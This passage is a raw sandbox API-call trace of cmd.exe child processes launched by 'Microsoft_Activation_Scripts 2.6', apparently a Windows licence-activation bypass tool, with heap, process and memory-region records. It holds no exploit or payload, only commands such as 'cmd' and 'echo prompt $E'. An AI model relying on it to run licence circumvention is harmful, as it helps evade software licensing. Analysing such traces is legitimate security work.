_String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="mas=htt", _MaxCount=0x7) returned -10 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="masver=", _MaxCount=0x7) returned -10 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="nul=>nu", _MaxCount=0x7) returned -11 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="nul1=1>", _MaxCount=0x7) returned -11 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="nul2=2>", _MaxCount=0x7) returned -11 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="nul6=2^", _MaxCount=0x7) returned -11 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.712] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="psc=pow", _MaxCount=0x7) returned -13 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="winbuil", _MaxCount=0x7) returned -20 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="_cmdf=C", _MaxCount=0x7) returned 4 [0176.713] _wcsnicmp (_String1="COPYCMD", _String2="_NCS=1", _MaxCount=0x7) returned 4 [0176.713] GetProcessHeap () returned 0x130b3e10000 [0176.714] RtlFreeHeap (HeapHandle=0x130b3e10000, Flags=0x0, BaseAddress=0x130b3e16bf0) returned 1 [0176.714] GetProcessHeap () returned 0x130b3e10000 [0176.714] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0x12) returned 0x130b3e16e20 [0176.714] lstrcmpW (lpString1="\\cmd.exe", lpString2="\\XCOPY.EXE") returned -1 [0176.715] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\cmd.exe", lpCommandLine="cmd", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\System32", lpStartupInfo=0x1271eff430*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cmd", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1271eff418 | out: lpCommandLine="cmd", lpProcessInformation=0x1271eff418*(hProcess=0x94, hThread=0x88, dwProcessId=0xcd0, dwThreadId=0xccc)) returned 1 [0176.727] CloseHandle (hObject=0x88) returned 1 [0176.727] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0176.727] GetProcessHeap () returned 0x130b3e10000 [0176.728] RtlFreeHeap (HeapHandle=0x130b3e10000, Flags=0x0, BaseAddress=0x130b3e1ef00) returned 1 [0176.728] GetEnvironmentStringsW () returned 0x130b3e1ef00* [0176.728] GetProcessHeap () returned 0x130b3e10000 [0176.728] RtlAllocateHeap (HeapHandle=0x130b3e10000, Flags=0x8, Size=0xbee) returned 0x130b3e24330 [0176.728] memcpy (in: _Dst=0x130b3e24330, _Src=0x130b3e1ef00, _Size=0xbee | out: _Dst=0x130b3e24330) returned 0x130b3e24330 [0176.728] FreeEnvironmentStringsA (penv="=") returned 1 [0176.728] GetProcessHeap () returned 0x130b3e10000 [0176.728] RtlFreeHeap (HeapHandle=0x130b3e10000, Flags=0x0, BaseAddress=0x130b3e16e20) returned 1 [0176.728] DeleteProcThreadAttributeList (in: lpAttributeList=0x1271eff510 | out: lpAttributeList=0x1271eff510) [0176.728] _dup2 (_FileHandleSrc=4, _FileHandleDst=0) returned 0 [0176.728] _close (_FileHandle=4) returned 0 [0176.729] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0177.014] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x1271eff898 | out: lpExitCode=0x1271eff898*=0x0) returned 1 [0177.014] CloseHandle (hObject=0x9c) returned 1 [0177.014] WaitForSingleObject (hHandle=0x94, dwMilliseconds=0xffffffff) returned 0x0 [0177.042] GetExitCodeProcess (in: hProcess=0x94, lpExitCode=0x1271eff898 | out: lpExitCode=0x1271eff898*=0x0) returned 1 [0177.042] CloseHandle (hObject=0x94) returned 1 [0177.042] _get_osfhandle (_FileHandle=1) returned 0x98 [0177.042] SetConsoleMode (hConsoleHandle=0x98, dwMode=0x0) returned 0 [0177.042] _get_osfhandle (_FileHandle=1) returned 0x98 [0177.042] GetConsoleMode (in: hConsoleHandle=0x98, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0177.042] _get_osfhandle (_FileHandle=0) returned 0x20 [0177.042] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0177.043] SetConsoleInputExeNameW () returned 0x1 [0177.043] GetConsoleOutputCP () returned 0x1b5 [0177.044] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0177.044] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.044] exit (_Code=0) Thread: id = 55 os_tid = 0x9d0 Process: id = "12" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x2d930000" os_pid = "0xcd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xcdc" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" echo prompt $E \"" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1188 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1189 start_va = 0x128f400000 end_va = 0x128f5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000128f400000" filename = "" Region: id = 1190 start_va = 0x128f600000 end_va = 0x128f6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000128f600000" filename = "" Region: id = 1191 start_va = 0x140d8970000 end_va = 0x140d898ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000140d8970000" filename = "" Region: id = 1192 start_va = 0x140d8990000 end_va = 0x140d89a4fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000140d8990000" filename = "" Region: id = 1193 start_va = 0x140d89b0000 end_va = 0x140d89b3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000140d89b0000" filename = "" Region: id = 1194 start_va = 0x140d89c0000 end_va = 0x140d89c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000140d89c0000" filename = "" Region: id = 1195 start_va = 0x140d89d0000 end_va = 0x140d89d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000140d89d0000" filename = "" Region: id = 1196 start_va = 0x7df5ffbf0000 end_va = 0x7ff5ffbeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffbf0000" filename = "" Region: id = 1197 start_va = 0x7ff7bd100000 end_va = 0x7ff7bd122fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bd100000" filename = "" Region: id = 1198 start_va = 0x7ff7bd6f0000 end_va = 0x7ff7bd749fff monitored = 1 entry_point = 0x7ff7bd7053f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1199 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1200 start_va = 0x140d89e0000 end_va = 0x140d8c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000140d89e0000" filename = "" Region: id = 1201 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1202 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1203 start_va = 0x140d8970000 end_va = 0x140d897ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000140d8970000" filename = "" Region: id = 1204 start_va = 0x7ff7bd000000 end_va = 0x7ff7bd0fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bd000000" filename = "" Region: id = 1222 start_va = 0x140d89e0000 end_va = 0x140d8a9dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1223 start_va = 0x140d8b40000 end_va = 0x140d8c3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000140d8b40000" filename = "" Region: id = 1224 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1225 start_va = 0x128f700000 end_va = 0x128f7fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000128f700000" filename = "" Region: id = 1226 start_va = 0x140d8c40000 end_va = 0x140d8d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000140d8c40000" filename = "" Region: id = 1227 start_va = 0x140d8980000 end_va = 0x140d8986fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000140d8980000" filename = "" Region: id = 1233 start_va = 0x140d8aa0000 end_va = 0x140d8aa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000140d8aa0000" filename = "" Thread: id = 56 os_tid = 0x1348 [0176.840] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffbea416e50 [0176.841] GetProcessHeap () returned 0x140d8b40000 [0176.841] RtlAllocateHeap (HeapHandle=0x140d8b40000, Flags=0x8, Size=0x4012) returned 0x140d8b4b320 [0176.841] GetProcessHeap () returned 0x140d8b40000 [0176.842] RtlFreeHeap (HeapHandle=0x140d8b40000, Flags=0x0, BaseAddress=0x140d8b4b320) returned 1 [0176.842] _wcsicmp (_String1="echo", _String2=")") returned 60 [0176.842] _wcsicmp (_String1="FOR", _String2="echo") returned 1 [0176.843] _wcsicmp (_String1="FOR/?", _String2="echo") returned 1 [0176.843] _wcsicmp (_String1="IF", _String2="echo") returned 4 [0176.843] _wcsicmp (_String1="IF/?", _String2="echo") returned 4 [0176.843] _wcsicmp (_String1="REM", _String2="echo") returned 13 [0176.843] _wcsicmp (_String1="REM/?", _String2="echo") returned 13 [0176.843] GetProcessHeap () returned 0x140d8b40000 [0176.843] RtlAllocateHeap (HeapHandle=0x140d8b40000, Flags=0x8, Size=0xb0) returned 0x140d8b461e0 [0176.843] GetProcessHeap () returned 0x140d8b40000 [0176.843] RtlAllocateHeap (HeapHandle=0x140d8b40000, Flags=0x8, Size=0x1a) returned 0x140d8b47e20 [0176.843] GetProcessHeap () returned 0x140d8b40000 [0176.843] RtlAllocateHeap (HeapHandle=0x140d8b40000, Flags=0x8, Size=0x28) returned 0x140d8b40790 [0176.846] GetConsoleTitleW (in: lpConsoleTitle=0x128f6ff9f0, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0176.918] _wcsicmp (_String1="echo", _String2="DIR") returned 1 [0176.918] _wcsicmp (_String1="echo", _String2="ERASE") returned -15 [0176.918] _wcsicmp (_String1="echo", _String2="DEL") returned 1 [0176.918] _wcsicmp (_String1="echo", _String2="TYPE") returned -15 [0176.918] _wcsicmp (_String1="echo", _String2="COPY") returned 2 [0176.918] _wcsicmp (_String1="echo", _String2="CD") returned 2 [0176.918] _wcsicmp (_String1="echo", _String2="CHDIR") returned 2 [0176.918] _wcsicmp (_String1="echo", _String2="RENAME") returned -13 [0176.918] _wcsicmp (_String1="echo", _String2="REN") returned -13 [0176.918] _wcsicmp (_String1="echo", _String2="ECHO") returned 0 [0176.918] GetProcessHeap () returned 0x140d8b40000 [0176.918] RtlAllocateHeap (HeapHandle=0x140d8b40000, Flags=0x8, Size=0x40) returned 0x140d8b407c0 [0176.922] GetProcessHeap () returned 0x140d8b40000 [0176.922] RtlReAllocateHeap (Heap=0x140d8b40000, Flags=0x0, Ptr=0x140d8b407c0, Size=0x26) returned 0x140d8b407c0 [0176.922] GetProcessHeap () returned 0x140d8b40000 [0176.922] RtlSizeHeap (HeapHandle=0x140d8b40000, Flags=0x0, MemoryPointer=0x140d8b407c0) returned 0x26 [0176.922] GetProcessHeap () returned 0x140d8b40000 [0176.922] RtlAllocateHeap (HeapHandle=0x140d8b40000, Flags=0x8, Size=0x32) returned 0x140d8b4a1e0 [0176.923] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="%s\r\n", _ArgList=0x128f6ff788 | out: _Buffer="prompt $E \r\n") returned 12 [0176.923] _get_osfhandle (_FileHandle=1) returned 0x98 [0176.924] GetFileType (hFile=0x98) returned 0x3 [0176.924] _get_osfhandle (_FileHandle=1) returned 0x98 [0176.924] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="prompt $E \r\n", cchWideChar=-1, lpMultiByteStr=0x7ff7bd735b80, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="prompt $E \r\n", lpUsedDefaultChar=0x0) returned 13 [0176.924] WriteFile (in: hFile=0x98, lpBuffer=0x7ff7bd735b80*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x128f6ff748, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesWritten=0x128f6ff748*=0xc, lpOverlapped=0x0) returned 1 [0176.924] _get_osfhandle (_FileHandle=1) returned 0x98 [0176.924] SetConsoleMode (hConsoleHandle=0x98, dwMode=0x0) returned 0 [0176.924] _get_osfhandle (_FileHandle=1) returned 0x98 [0176.924] GetConsoleMode (in: hConsoleHandle=0x98, lpMode=0x7ff7bd72960c | out: lpMode=0x7ff7bd72960c) returned 0 [0176.924] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.925] GetConsoleMode (in: hConsoleHandle=0x20, lpMode=0x7ff7bd729608 | out: lpMode=0x7ff7bd729608) returned 1 [0176.962] SetConsoleInputExeNameW () returned 0x1 [0176.962] GetConsoleOutputCP () returned 0x1b5 [0176.966] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x7ff7bd729660 | out: lpCPInfo=0x7ff7bd729660) returned 1 [0176.966] SetThreadUILanguage (LangId=0x0) returned 0x409 [0176.979] exit (_Code=0) Thread: id = 58 os_tid = 0x318 Process: id = "13" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x3323a000" os_pid = "0xcd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xcdc" cmd_line = "cmd" cur_dir = "C:\\Windows\\System32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ff75" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1205 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1206 start_va = 0x9cea200000 end_va = 0x9cea3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000009cea200000" filename = "" Region: id = 1207 start_va = 0x9cea400000 end_va = 0x9cea4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000009cea400000" filename = "" Region: id = 1208 start_va = 0x27918940000 end_va = 0x2791895ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000027918940000" filename = "" Region: id = 1209 start_va = 0x27918960000 end_va = 0x27918974fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000027918960000" filename = "" Region: id = 1210 start_va = 0x27918980000 end_va = 0x27918983fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000027918980000" filename = "" Region: id = 1211 start_va = 0x27918990000 end_va = 0x27918990fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000027918990000" filename = "" Region: id = 1212 start_va = 0x279189a0000 end_va = 0x279189a1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000279189a0000" filename = "" Region: id = 1213 start_va = 0x7df5ffad0000 end_va = 0x7ff5ffacffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffad0000" filename = "" Region: id = 1214 start_va = 0x7ff7bd600000 end_va = 0x7ff7bd622fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bd600000" filename = "" Region: id = 1215 start_va = 0x7ff7bd6f0000 end_va = 0x7ff7bd749fff monitored = 1 entry_point = 0x7ff7bd7053f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 1216 start_va = 0x7ffbed960000 end_va = 0x7ffbedb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1217 start_va = 0x279189b0000 end_va = 0x27918b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000279189b0000" filename = "" Region: id = 1218 start_va = 0x7ffbed570000 end_va = 0x7ffbed61cfff monitored = 0 entry_point = 0x7ffbed5881a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1219 start_va = 0x7ffbea3c0000 end_va = 0x7ffbea5a7fff monitored = 0 entry_point = 0x7ffbea3eba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1220 start_va = 0x27918940000 end_va = 0x2791894ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000027918940000" filename = "" Region: id = 1221 start_va = 0x7ff7bd500000 end_va = 0x7ff7bd5fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff7bd500000" filename = "" Region: id = 1228 start_va = 0x27918b50000 end_va = 0x27918c0dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1229 start_va = 0x7ffbed880000 end_va = 0x7ffbed91cfff monitored = 0 entry_point = 0x7ffbed8878a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1230 start_va = 0x9cea500000 end_va = 0x9cea5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000009cea500000" filename = "" Region: id = 1231 start_va = 0x27918c10000 end_va = 0x27918dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000027918c10000" filename = "" Region: id = 1232 start_va = 0x27918950000 end_va = 0x27918956fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000027918950000" filename = "" Region: id = 1234 start_va = 0x279189b0000 end_va = 0x279189b6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000279189b0000" filename = "" Region: id = 1235 start_va = 0x27918a50000 end_va = 0x27918b4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000027918a50000" filename = "" Region: id = 1236 start_va = 0x7ffbd7f30000 end_va = 0x7ffbd7f3dfff monitored = 0 entry_point = 0x7ffbd7f31da0 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1237 start_va = 0x27918c10000 end_va = 0x27918d05fff monitored = 0 entry_point = 0x27918c11840 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 1238 start_va = 0x27918df0000 end_va = 0x27918dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000027918df0000" filename = "" Region: id = 1239 start_va = 0x27918c10000 end_va = 0x27918d05fff monitored = 0 entry_point = 0x27918c11840 region_type = mapped_file name = "basebrd.dll" filename = "\\Windows\\Branding\\Basebrd\\basebrd.dll" (normalized: "c:\\windows\\branding\\basebrd\\basebrd.dll") Region: id = 1240 start_va = 0x279189c0000 end_va = 0x279189c0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "basebrd.dll.mui" filename = "\\Windows\\Branding\\Basebrd\\en-US\\basebrd.dll.mui" (normalized: "c:\\windows\\branding\\basebrd\\en-us\\basebrd.dll.mui") Region: id = 1241 start_va = 0x27918e00000 end_va = 0x27919136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1242 start_va = 0x279189c0000 end_va = 0x279189e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Thread: id = 57 os_tid = 0xccc [0176.961] GetProcAddress (hModule=0x7ffbed570000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffbea416e50 [0176.961] _get_osfhandle (_FileHandle=0) returned 0x20 [0176.961] GetFileType (hFile=0x20) returned 0x3 [0176.961] _setmode (_FileHandle=0, _Mode=32768) returned 16384 [0176.961] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x9cea4ff9e8 | out: TokenHandle=0x9cea4ff9e8*=0x0) returned 0xc000007c [0176.961] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x9cea4ff9e8 | out: TokenHandle=0x9cea4ff9e8*=0x9c) returned 0x0 [0176.961] NtQueryInformationToken (in: TokenHandle=0x9c, TokenInformationClass=0x12, TokenInformation=0x9cea4ff998, TokenInformationLength=0x4, ReturnLength=0x9cea4ff9a0 | out: TokenInformation=0x9cea4ff998, ReturnLength=0x9cea4ff9a0) returned 0x0 [0176.961] NtQueryInformationToken (in: TokenHandle=0x9c, TokenInformationClass=0x1a, TokenInformation=0x9cea4ff9a0, TokenInformationLength=0x4, ReturnLength=0x9cea4ff998 | out: TokenInformation=0x9cea4ff9a0, ReturnLength=0x9cea4ff998) returned 0x0 [0176.961] NtClose (Handle=0x9c) returned 0x0 [0176.961] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x9cea4ff9b0, nSize=0x0, Arguments=0x9cea4ff9b8 | out: lpBuffer="擰ᢥɹ") returned 0xf [0176.961] GetProcessHeap () returned 0x27918a50000 [0176.961] RtlAllocateHeap (HeapHandle=0x27918a50000, Flags=0x8, Size=0x218) returned 0x27918a5bcb0 [0176.962] GetConsoleTitleW (in: lpConsoleTitle=0x9cea4ffa00, nSize=0x104 | out: lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 0x31 [0176.963] wcsstr (_Str="Administrator: Microsoft_Activation_Scripts 2.6", _SubStr="Administrator: ") returned="Administrator: Microsoft_Activation_Scripts 2.6" [0176.963] wcsstr (_Str=" Microsoft_Activation_Scripts 2.6", _SubStr="Administrator: ") returned 0x0 [0176.963] SetConsoleTitleW (lpConsoleTitle="Administrator: Microsoft_Activation_Scripts 2.6") returned 1 [0176.966] GetProcessHeap () returned 0x27918a50000 [0176.967] RtlFreeHeap (HeapHandle=0x27918a50000, Flags=0x0, BaseAddress=0x27918a5bcb0) returned 1 [0176.967] LocalFree (hMem=0x27918a564f0) returned 0x0 [0176.967] GetProcessHeap () returned 0x27918a50000 [0176.967] RtlFreeHeap (HeapHandle=0x27918a50000, Flags=0x0, BaseAddress=0x27918a57ae0) returned 1 [0176.968] _vsnwprintf (in: _Buffer=0x7ff7bd731b60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x9cea4ff848 | out: _Buffer="\r\n") returned 2 [0176.968] 